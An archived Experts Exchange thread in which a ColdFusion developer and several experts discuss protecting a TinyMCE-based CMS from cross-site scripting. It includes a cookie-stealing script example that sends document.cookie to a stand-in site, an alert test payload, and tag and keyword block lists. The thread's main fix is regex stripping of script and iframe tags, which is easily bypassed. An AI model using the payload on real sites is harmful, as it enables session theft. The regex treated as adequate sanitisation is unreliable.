Solved

question about HTMLEditFormat()

Posted on 2011-03-04
26
1,168 Views
Last Modified: 2012-06-22
I'm concerned about XSS attacks. I did some reading about, and have tried to implement, the  HTMLEditFormat() function.

However, when I use HTMLEditFormat() in a form input, or in a CFOUTPUT, the output on the page is the raw HTML code.

For example, if I do this:

<cfquery name="UpdatePage" datasource="#ds#">
				  UPDATE tbl_acct_navigation
				  SET
                    PageTitle = <cfqueryparam cfsqltype="cf_sql_varchar"  value="#HTMLEditFormat(form.PageTitle)#">,   
                    PageContentLeft = <cfqueryparam cfsqltype="cf_sql_varchar"  value="#HTMLEditFormat(form.PageContentLeft)#">,
                    PageContentRight = <cfqueryparam cfsqltype="cf_sql_varchar"  value="#HTMLEditFormat(form.PageContentRight)#">,
                    DateModified = <cfqueryparam cfsqltype="cf_sql_timestamp" value="#now()#">
				  WHERE PageID = <cfqueryparam cfsqltype="cf_sql_integer" value="#val(form.PageID)#">
			</cfquery>

Open in new window

.... then the page output displays the HTML code; the HTML is not parsed by the browser. You can see it here:

http://www.coalcountryteam.org/index.cfm?PageID=76

Where should I implement HTMLEditFormat() to add a little protection against XSS attacks?

Sorry to be asking so many questions of late. =) I really appreciate people's time.

Eric B
0
Comment
Question by:Eric Bourland
  • 9
  • 7
  • 4
  • +2
26 Comments
 
LVL 39

Assisted Solution

by:gdemaria
gdemaria earned 400 total points
ID: 35041561
0
 
LVL 39

Assisted Solution

by:gdemaria
gdemaria earned 400 total points
ID: 35041566

The first question is, what do you want the user to be able to enter into your form?

If you can say, no HTML at all, then you just need a regular expression that strips out any invalid characters such as < > tags..

If you keep the data from getting submitted by the form, then it's easier to handle displaying it back on the page
0
 
LVL 39

Assisted Solution

by:gdemaria
gdemaria earned 400 total points
ID: 35041578
>  the HTML is not parsed by the browser. You can see it here:

I think you don't realize it, but this IS the desired result.


 Test Page
<p>"Testing" &amp; &lt;script&gt;</p>


You have done exactly what you intended to do, you have prevented this code from being executed and harming your site.

The only problem MAY be, that you are keeping simple commands such as bold and italic from being used.  That's the question of my first post, if you don't want these, then you are all set.  If you do, you need more intelligent filtering to try and allow some HTML command and not the other tags.

Or you can do like EE does, see the icons at the top of the dialog boxes?   Then enter "fake" HTML like command such as [ bold ] and [ underline ].  Then in your code, you translate this into a real HTML bold tag..

Just depends on what you want..   some tags, no tags..


0
 
LVL 3

Author Comment

by:Eric Bourland
ID: 35041673
Darn. I just typed a careful reply here, and lost it when I tried to include a screencast. ~sigh~

gdemaria it is good to hear from you.

I want to include almost all HTML. I use the TinyMCE editor to allow this client to enter content and update her web pages. I also need to use a wide range of HTML tags, so I don't want to block any valid HTML tags.

I would like to block stuff like <script>/remotehost/terriblescript.js</script>

So I don't know if the HTMLEditFormat function is what I need. The Nadel article was great -- I like his blog a lot -- but Nadel mentions that developers need to be careful about escaping necessary HTML. (There are also some interesting notes about the vulnerabilities of scriptProtect. I have disabled scriptProtect in application.cfc, so that my client can embed video and slideshows using EMBED and OBJECT tags. Yet I wonder if in doing so I have made my application more vulnerable.)

So, I have been reading about XSS vulnerabilities, and I want to secure my application against them as much as I can; however, I don't know if HTMLEditFormat is what I need.

HTMLEditFormat makes my test page display HTML code -- which makes sense, given the way that I have used it.

Is HTMLEditFormat the right solution for this task? Is there a better way to block:

<script>/remotehost/terriblescript.js</script>

Thank you again. Hope you are well.

Eric
0
 
LVL 15

Assisted Solution

by:myselfrandhawa
myselfrandhawa earned 25 total points
ID: 35041855
here is the one script tha can really help in you in your XSS attacks!

in Application.cfm write this function

<cfset request.XSSAttacks = "(script)|(<)|(>)|(%3c)|(%3e)|(SELECT) |(UPDATE) |(INSERT) |(DELETE)|(GRANT) |(REVOKE)|(UNION)|(&lt;)|(&gt;)">

Now in your action Pages! Do something like this!

<cfif REFindNoCase("request.XSSAttack",form.comments)>
XSS Attack Found! Stop Processing
<cfelse>
Continue
</cfif>

0
 
LVL 39

Accepted Solution

by:
gdemaria earned 400 total points
ID: 35043537
> HTMLEditFormat makes my test page display HTML code

Exactly, so you don't want to use it because you do want to keep most of your HTML.


When a user submits their content, then you can strip out any <script> tags using something like this...

<cfset text = ReReplaceNoCase (text, "<script.*?>.*?</script>", "", "all")>

change "text" to your form variable


myselfrandhawa, your script is too restrictive.  It will block too much.   Even if the user enters simple text like "The teachers' union will update the parents about the new grant proposal"





0
 
LVL 11

Assisted Solution

by:Brijesh Chauhan
Brijesh Chauhan earned 50 total points
ID: 35043561

Where should I implement HTMLEditFormat() to add a little protection against XSS attacks?

Eric, hopefully you have done your research, XSS attacks are of 3 types,

Persistent
Non-Persistent
and DOM-Based

Let's consider a BLOG where users are allowed to post comments, in the comment I can post the below script, which sends your cookies to other website

<script type="text/javascript">
document.location='http://www.yoursite.com?' + document.cookie;
</script>

Open in new window


so to stop this you can use HTMLEditFormat()

and the above code will become

&lt;script type=&quot;text/javascript&quot;&gt;
document.location='http://www.evilsite.com?' + document.cookie;
&lt;/script&gt;

Open in new window


and will NOT execute..


<cfoutput>#HTMLEditFormat(qBlogComments.comment)#</cfoutput>

Another method for reducing XSS vulnerability is to enable script protection. This can be done globally in the ColdFusion Administrator, or on a per-application basis in Application.cfc.

Script Protection monitors the Form, URL, CGI, and Cookie scopes looking for potentionally threatening tags. The tags it looks for are: object, embed, script, applet, and meta. If it finds any of these tags, or any that resemble them, it will replace them with and InvalidTag tag.

To enable Global Script Protection:

   1. Go to you ColdFusion Administrator
   2. Go into the Server Settings section on the left
   3. Under "settings" you will find the check box "Enable Global Script Protection". Check it
   4. Click "Submit Changes"

This turns on Script Protection for All Scopes on All Applications on the server.

If you want to control script protection at the application level, or you do not have access to the ColdFusion Administrator, you can enable it in your Application.cfc by placing this line in the pseudo-constructor area:


<cfset this.scriptprotect="all">

Open in new window


This will enable script protection for only that application, but for all scopes. You can also place place a comma delimited list of scopes to protect, if for some reason you do not want to protect them all.

Script Protection, just like HTMLEditFormat(), can also be over-protective, because it will also find tags that are harmless but resemble the potentially dangerous tags.
0
 
LVL 11

Expert Comment

by:Brijesh Chauhan
ID: 35043577
0
 
LVL 39

Expert Comment

by:gdemaria
ID: 35043601

Brijesh, do you actually read anything before making your posts?  

The author wants to have HTML in this post so cannot use HTMLeditFormat(), script protection and cannot strip out all HTML as your links states.

Eric, you need to selectively remove the tags that you don't want as I showed in my post

0
 
LVL 3

Author Comment

by:Eric Bourland
ID: 35043630
brijeshchauhan, myselfrandhawa, and gdemaria,

I have a lot to think about, and much more reading and research to do.

I have indeed enabled Global Script Protection in ColdFusion Administrator.

However, in my application.cfc file, I disabled Global Script Protection using:

  <cfset this.scriptProtect = "No">

Why did I do that? Because Script Protection did not let me use EMBED and OBJECT tags, which are required when one wants to embed media from Flickr or Picasa. This feature is very important to this particular client.

This does make me a little nervous. Even though the administrative interface is inside a password protected folder, I don't like to have scriptProtect disabled without using some other kind of protection against XSS.

I will try gdemaria's script; I will also do some more reading as suggested by brijeshchauhan. I really appreciate everybody's very helpful comments. I will get back here later today. Hope you are all having a great day.

Eric
0
 
LVL 11

Expert Comment

by:Brijesh Chauhan
ID: 35043637
The author has mentioned this...

Where should I implement HTMLEditFormat() to add a little protection against XSS attacks?

So just had him show on it...

Anyways, if the post is not useful, then it can be ignored.. it's up to the author..
0
 
LVL 3

Author Comment

by:Eric Bourland
ID: 35043672
brij, I always appreciate your input.

I post many questions in this ColdFusion forum -- and I always get many very helpful replies. I have an abiding gratitude for everybody here.

I'm also aware that I need to contribute more, myself, in areas in which I have more experience: CSS, for example, and support for PC and Macintosh hardware and software.

Thank you for your help. =) I'm going to try gdemaria's Regular Expression Replace idea:

<cfset text = ReReplaceNoCase (text, "<script.*?>.*?</script>", "", "all")>

... and see what happens. I have read your replies carefully and I really appreciate your time.

Eric
0
 
LVL 15

Expert Comment

by:myselfrandhawa
ID: 35043702
@ eric, Its all Upon your requirements what exactly you want to try!

My Suggestion will be use all the inputs provided by us and implemented it!

My, Brij, gd all of us have provided you different approaches so i think you can create a combination of all three and that can help you a lot in making ur application secure!

if you want to know more about the stopping of attacks! just read the below:

http://www.coldfusioncookbook.com/entry/36/How-can-I-prevent-SQL-injection-attacks?
0
Threat Intelligence Starter Resources

Integrating threat intelligence can be challenging, and not all companies are ready. These resources can help you build awareness and prepare for defense.

 
LVL 11

Expert Comment

by:Brijesh Chauhan
ID: 35044235
Eric, there is also one project called antisamy based on Java which can be used for protecting website against XSS attacks.. it's open source and can be downloaded from

http://code.google.com/p/owaspantisamy/downloads/list

and it's implementation is blogged in the following post

http://blog.pengoworks.com/index.cfm/2008/1/3/Using-AntiSamy-to-protect-your-CFM-pages-from-XSS-hacks

You can give it a try...

0
 
LVL 13

Assisted Solution

by:srikanthmadishetti
srikanthmadishetti earned 25 total points
ID: 35044421
Nice to see a good discussion  .

I personally like this

http://www.codfusion.com/blog/page.cfm/projects/portcullis

it has good functions like

filterSQL,filterwords ,badSQLContext ,escapeChars,isvalidcfvariablename,filterTags

At the starting of the cfc you can see

      <cfset variables.instance.sqlFilter = "select,insert,update,delete,create,drop,alter,declare,execute,--,xp_,sp_sqlexecute,table_cursor,cast\(,exec\(,eval\(,information_schema"/>
      <cfset variables.instance.tagFilter = "script,object,applet,embed,form,input,layer,ilayer,frame,iframe,frameset,param,meta,base,style"/>
      <cfset variables.instance.wordFilter = "onLoad,onClick,onDblClick,onKeyDown,onKeyPress,onKeyUp,onMouseDown,onMouseOut,onMouseUp,onMouseOver,onBlur,onChange,onFocus,onSelect,javascript:,vbscript:,.cookie,.toString,:expr,:expression,.fromCharCode,String."/>

so you remove or add to this lists with ones you want which will handled in that CFC

hope this help.

0
 
LVL 39

Assisted Solution

by:gdemaria
gdemaria earned 400 total points
ID: 35044462

Eric, you are very gratious and always open and kind.  That makes you a pleasure to help.

Let me be very clear about my concern.  I agree that input from multiple people IS IMPORTANT; it is a core benefit of experts-exchange.  

I get frustrated, however, when moving down a path with an asker and someone posts things that derail the conversation; posts that do not continue down the path towards the resolution.   As you know Eric, your question threads can be very long; each post needs to build upon previous posts until we get to where we need to be.  

As an Example, Brijesh, you provided links to HTMLeditFormat(), Script Protection, stripping out all HTML from form fields.    MySelfrandhawa, suggested stripping out all html and stripping out keywords.  

IMO, none of these are applicable and only slow down the process and add confusion.  

But of course, this is my opinion, and I others may disagree.  Having multiple opinions is great for education and helps finds creative solutions.   So, given that, I suggest Brijesh and Myselfrandhawa, that if you're going to post infromation that is *against* what an expert has sugested or against what the *asker wants*, you need to either (1) say you disagree and why or (2) say that this information is NOT the solution, but may be interesting to read.

I feel like this thread is now in many different directions and will be much harder to resolve.  If you do what Myselfrandhawa suggested and combine all of the suggestions, it will not work and you will just spin your wheels.




0
 
LVL 3

Author Comment

by:Eric Bourland
ID: 35044878
I'm working with gdemaria's idea to use <cfset text = ReReplaceNoCase (text, "<script.*?>.*?</script>", "", "all")>

I implemented that code in my edit page -- the page in which the user updates database records. I use this code, below:

 <!--- set up protection against XSS  --->

<cfset form.PageTitle) = ReReplaceNoCase (form.PageTitle), "<script.*?>.*?</script>", "", "all")>
<cfset form.PageContentLeft) = ReReplaceNoCase (form.PageContentLeft), "<script.*?>.*?</script>", "", "all")>
<cfset form.PageContentRight) = ReReplaceNoCase (form.PageContentRight), "<script.*?>.*?</script>", "", "all")>

Open in new window


and I get an error, which I note below.

srikanthmadis, I saw the Portcullis application and it looks very useful -- and that is something I am going to check out further.

brij and myselfrandhawa -- I am going to follow up separately about the excellent resources that you have recommended. I do think that HTMLeditFormat() is not the right solution for this particular problem but I do see that it is very useful in other solutions. I really appreciate your help.

Per gdemaria's notes I am going to first try to get <cfset text = ReReplaceNoCase (text, "<script.*?>.*?</script>", "", "all")>
to work. That looks like a very useful solution for this particular problem.

Thanks again to all.

E
error text:

Error Occurred While Processing Request  
Invalid CFML construct found on line 14 at column 22.  
ColdFusion was looking at the following text:<p>)</p><p>The CFML compiler was processing:<ul><li>A cfset tag beginning on line 14, column 2.</ul>  
  
The error occurred in C:/websites/www.coalcountryteam.org/admin/editPages.cfm: line 14
 
12 : 
13 :  <!--- set up protection against XSS scripts --->
14 : <cfset form.PageTitle) = ReReplaceNoCase (form.PageTitle), "<script.*?>.*?</script>", "", "all")>
15 : <cfset form.PageContentLeft) = ReReplaceNoCase (form.PageContentLeft), "<script.*?>.*?</script>", "", "all")>
16 : <cfset form.PageContentRight) = ReReplaceNoCase (form.PageContentRight), "<script.*?>.*?</script>", "", "all")>

Open in new window

0
 
LVL 3

Author Comment

by:Eric Bourland
ID: 35044902
I might need to provide more information about the edit page -- it's simple. I use a CFINPUT tag to update PageTitle:

<p><strong>Page Title:</strong>
  	 <cfinput
     		type="Text"
			name="PageTitle"
			value="#Trim(form.PageTitle)#"
            message="Please enter a Document Title."
            required="Yes"
            validateAt="onSubmit,onServer" 
			size="50"
			maxlength="255"></p>

Open in new window


And I use a textarea input field to update Page Content for the left and right sides of the page; example:

 <textarea name="PageContentLeft"
   			width="770"
			height="800"
            style="width:770px;height:800px;" wrap="virtual">
 
            <cfoutput>#form.PageContentLeft#</cfoutput>
   
			</textarea>

Open in new window


I implement the TinyMCE javascript editor to apply a WYSIWYG interface to the textarea, for the convenience of the end user.

0
 
LVL 39

Assisted Solution

by:gdemaria
gdemaria earned 400 total points
ID: 35045109
Eric, you have a couple of simple type-o

In each of the lines, you have a ) before the equal sign and again after the variable name

<cfset form.PageTitle) = ReReplaceNoCase (form.PageTitle), "<script.*?>.*?</script>", "", "all")>
                          ^^^                                            ^^^


It should be like this...

<cfset form.PageTitle = ReReplaceNoCase (form.PageTitle, "<script.*?>.*?</script>", "", "all")>

Please check the other lines, they have the same issue..
0
 
LVL 13

Expert Comment

by:srikanthmadishetti
ID: 35045168
Eric ,

You can see the function filterTags in portcullis.cfc

0
 
LVL 15

Expert Comment

by:myselfrandhawa
ID: 35045254
@ all

I have heard a lot of portcullies, never used, But i will try it NOw

Thx
0
 
LVL 15

Expert Comment

by:myselfrandhawa
ID: 35045749
One addition to make, Check this article by SIDFISH' a Cf Community GURU

http://sidfishes.wordpress.com/2009/03/17/60/
0
 
LVL 39

Assisted Solution

by:gdemaria
gdemaria earned 400 total points
ID: 35046402
Eric,

 Don't confuse SQL injection attacks with XSS attacks.  You have handled SQL injection in the past.  Focusing on XSS, you don't want to be overly restrictive because you want HTML to be accepted.  However, the Sid Fish article does raise a good point, you should probably block iFrames as well.   But that is first a business decision, when the user enters his own html, do you want him/her to be able to put in an iFrame, if not, add that to the cleaning script...

<cfset form.PageTitle = ReReplaceNoCase (form.PageTitle, "<script.*?>.*?</script>", "", "all")>
<cfset form.PageTitle = ReReplaceNoCase (form.PageTitle, "<iframe.*?>.*?</iframe>", "", "all")>

0
 
LVL 3

Author Comment

by:Eric Bourland
ID: 35052157
gdemaria,

>>>In each of the lines, you have a ) before the equal sign and again after the variable name

Of course. Thank you. =)

I believe it is working. I tested by typing

"><script>alert("XSS")</script><

into the text update field; then saved the page. Then I view the updated page, but a javascript alert does not pop up, and in the source code the script tags have been removed. However I can paste in all other HTML. This is exactly what I needed.

>>>Don't confuse SQL injection attacks with XSS attacks.

Yep. I understand the difference. We handled a SQL injection in April of 2010 -- I remember it well.

brijeshchauhan and srikanthmadis, I am going to check out portcullis further. At this point I feel I am pretty well protected; I have a password-protected edit page that does not allow the script tag, but allows embed, object, and most other HTML tags.

I also found an option in TinyMCE that strips away selected tags:

invalid_elements : "b,i,script",

I added this line to my TinyMCE initialization code, to disallow the deprecated tags "i" and "b" and the dangerous tag "script".

I'm going to allow iframes for now. YouTube uses them, and this client embeds video from Youtube, so for now I need to accommodate her need for iframes unless a real security problem comes up.

I really appreciate all input. I'm going to close this question, with a lot of gratitude. I would like to award 500 points to everyone who contributed. I will give the majority of the points to gdemaria, who kept this question on task and provided an elegant solution. But I want to stress how grateful I am to myselfrandhawa, srikanthmadis…, and brijeshchauhan. I look forward to working with you again.

My small part of the internet is safer than it was before. ;-)

Eric
0
 
LVL 3

Author Closing Comment

by:Eric Bourland
ID: 35052238
Thank you gdemaria, myselfrandhawa, srikanthmadis…, and brijeshchauhan.

=)

Eric B
0
 
LVL 39

Expert Comment

by:gdemaria
ID: 35056190
> a password-protected edit page

That really help also, attacks usually don't come from an area that is protected.. you can always identify the culprit :)

0

Featured Post

How to run any project with ease

Manage projects of all sizes how you want. Great for personal to-do lists, project milestones, team priorities and launch plans.
- Combine task lists, docs, spreadsheets, and chat in one
- View and edit from mobile/offline
- Cut down on emails

Join & Write a Comment

Suggested Solutions

Title # Comments Views Activity
Weird Behavior in ColdFusion 8 65
Database set up 5 60
Cold Fusion Session Timing Out 11 54
Passing value to a stored procedure 8 68
Hi, I will be creating today a basic tutorial on how we can create a Mail Custom Function and use it where ever we want. The main advantage about creating a custom function is that we can accommodate a range of arguments to pass to the Function and …
Recently while working on a project I got a very annoying cfdocument has no body error message. I had never seen this error before. So I checked the code. The code was pretty simple; it was Just showing me the cfdocumnt tag and inside that tag a …
In this seventh video of the Xpdf series, we discuss and demonstrate the PDFfonts utility, which lists all the fonts used in a PDF file. It does this via a command line interface, making it suitable for use in programs, scripts, batch files — any pl…
In this tutorial you'll learn about bandwidth monitoring with flows and packet sniffing with our network monitoring solution PRTG Network Monitor (https://www.paessler.com/prtg). If you're interested in additional methods for monitoring bandwidt…

705 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

22 Experts available now in Live!

Get 1:1 Help Now